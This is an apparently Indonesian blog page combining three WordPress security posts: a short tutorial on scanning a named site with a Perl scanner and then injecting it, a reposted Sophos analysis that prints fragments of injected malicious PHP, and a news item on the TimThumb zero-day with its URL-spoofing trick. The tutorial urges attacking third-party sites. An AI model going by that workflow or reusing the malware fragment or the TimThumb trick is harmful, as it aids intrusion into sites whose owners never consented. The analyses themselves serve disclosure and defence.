Tutorial Wordpress Scanning

Assalamu'alaikum dan salam sejahtera buat kita semua
ketemu agy ma ane yg newbie nie
kali ini ane akan memberikan sedikit tutor mengenai Scanning Wordpress dan

tanpa banyak bacot langsung ke topic utamanya ea

CEKIDOT !!!

1. Download software wordpress scanner disini wp-scan

==============================================================

-=- kita akan menjalankan wordpress scanner

setelah di download,, extract dulu file tersebut

buka terminal dan ketikkan command berikut ini :

cd Downloads
cd WP-SCAN
perl wp-scan.pl target.com
ex : perl wp-scan.pl www.webhostingiix.com

setelah proses scan selesai,,kalian bisa melihat hasilnya(proses nya ga nampak disana)
ntar ada report kalo udh finished, bisa dilihat hasilnya di sqli-bugs.txt di folder wp-scan tadi

selanjutnya kalian bisa melakukan penginjectkan terhadap target
===========================================================================

silahkan tunggu sampai selesai dari proses scanning

nantinya disana akan tertera mana saja yang vuln

setelah selesai semuanya,,kita tinggal nyari exploitnya saudara-saudara

untuk nyari exploitnya bisa cari dimana saja

sekian dulu tutor cupu dari ane

semoga bermanfaat buat kita semua

akhir kata dari ane, wassalam

nb : vba & ArRay Read More...

Troj/PHPShll-B: Malware injects itself into WordPress installations

On Friday, a colleague in our IT department asked about a Mal/Badsrc-C malware detection that had been found by Sophos products on one of their friends' websites.

When I initially downloaded the website it looked clean. However, the automated systems inside SophosLabs were detecting the webpage as being infected with Mal/Badsrc-C.

So, I investigated a little more deeply - repeating the download after setting the User-Agent in my browser to pretend to be Internet Explorer.

This time I saw:

>>> Virus 'Mal/Badsrc-C' found in file index.html

Clearly, the malware on the website was planted in such a way that it would only manifest itself if it believed that the computer visiting the webpage was running Internet Explorer.

When you look at the last line of the index.html file you can see the appended malicious script tag:



As my colleague knew the affected website's owner, I was able to gain a complete copy of the site which was running an installation of the popular WordPress blogging platform.

Looking at the WordPress configuration file (wp-config.php) I saw a suspicious piece of code prepended:



When this code is run it decodes to some suspicious code:

stristr($_SERVER["HTTP_USER_AGENT"],"MSIE 6")||stristr($_SERVER["HTTP_USER_AGENT"],"MSIE 7")||stristr($_SERVER["HTTP_USER_AGENT"],"MSIE 8")||stristr($_SERVER["HTTP_USER_AGENT"],"MSIE 9")){ return base64_decode("PHNjcmlwdCBzcm...

The above code snippet means that malicious code will only be served if the User-Agent is Internet Explorer. The geekier amongst you will recognise the base64 string as being the beginning of:

<script src

Sophos now detects and disinfects this modified code as Troj/PHPShll-B.

So, what's happened is that somehow malicious code has managed to inject itself into the PHP code used on some websites running WordPress, meaning that if you visit them when running Internet Explorer you could be exposing yourself to a malware attack.

What isn't clear is exactly how the malicious code managed to embed itself on the website, although it was most probably via compromised FTP credentials.

If you run a site which uses WordPress you would be wise to ensure that your passwords are chosen carefully (not dictionary words, and not easy to guess) and that you are not using the same credentials on any other websites. If you think it's possible that your password details may have been stolen - or if you use the same passwords elsewhere on the internet - change them immediately.

Furthermore, you should be regularly auditing the code on your site to ensure that there have not been any unauthorised changes.

Finally, always ensure that your website software is up-to-date and fully patched.
This hack appears to be widespread and website owners need to be vigilant.

nb : nakedsecurity.sophos

Read More...

Zero-day Vulnerability In TimThumb Image Utility Threatens Many WordPress Sites

This is pretty apt after we wrote about WebsiteDefender – Ensure Your Website Security on Monday, a platform for securing web applications with a focus on WordPress. Today a zero-day in a very commonly used WordPress library hit quite a few news sites.

The flaw is in an image utility called TimThumb which is used in a LOT of premium themes for generating on the fly thumbnails, you can check it out (and grab the latest version) here:
http://code.google.com/p/timthumb/

Attackers are exploiting a widely used extension for the WordPress publishing platform to take control of vulnerable websites, one of the victims has warned.
The vulnerability affects virtually all websites that have an image-resizing utility called TimThumb running with WordPress, Mark Maunder, CEO of Seattle-based Feedjit, wrote in a post published Monday. The extension is “inherently insecure” because it makes it easy for hackers to execute malicious code on websites that use it. At least two websites have already been compromised, he reported.

Maunder said he found the vulnerability after discovering his own website, markmaunder.com, was suddenly and inexplicably loading advertisements, even though the blog wasn’t configured to do so.

After a thorough investigation, he learned that an attacker had used TimThumb to load a PHP file into one of his site directories and then execute it. The utility, he said, by default allows files to be remotely loaded and resized from blogger.com, wordpress.com, and five other websites and doesn’t vet URLs for malicious strings, making it possible to upload malicious payloads.

I personally think this could cause some major problems because TimThumb is bundled with almost every WordPress theme (free ones or otherwise) and is invariably an old version – which will be insecure. It creates an image cache inside the readable webroot – which is really bad.

Plus the URL filtering doesn’t really work properly, so with your own domain you could create a subdomain malware.flickr.com.darknet.org.uk/malware.php and host up some nasty files there, call TimThumb on that file and it’d be cached in the webroot.

“So if you create a file on a web server like so: http://blogger.com.somebadhackersite.com/badscript.php and tell timthumb.php to fetch it, it merrily fetches the file and puts it in the cache directory ready for execution,” Maunder explained.

He went on to report the technique was used on Friday to hack Ben Gillbanks, developer of TimThumb. Gilders is working on a permanent fix, but in the meantime, Maunder has submitted a temporary patch that fixes the most obvious errors.

“I can’t apologise enough for this oversight in the code and hope nobody has anything too bad happen to their sites because of my error,” Gilders wrote in a comment responding to Maunder’s post

One of the first people that was hit was a WordPress developer himself (which is a good thing as it means we get a quick fix), a new more secure version (hopefully) is in the works and the developer has pushed out some quick fixes in the current version to make it harder to exploit.
You can grab the latest TimThumb.php code here:

http://timthumb.googlecode.com/svn/trunk/timthumb.php

There are also a lot more details on how to fix the problem on Mark Maunder’s blog, CEO of Seattle-based Feedjit:

Zero Day Vulnerability in Many WordPress Themes

There’s a story from Network World here too:

Zero-day vulnerability found in a WordPress image utility 

TimThumb is in many themes with other names, so please also search for thumb.php, cropper.php, crop.php & resize.php.

Site: The Register Read More...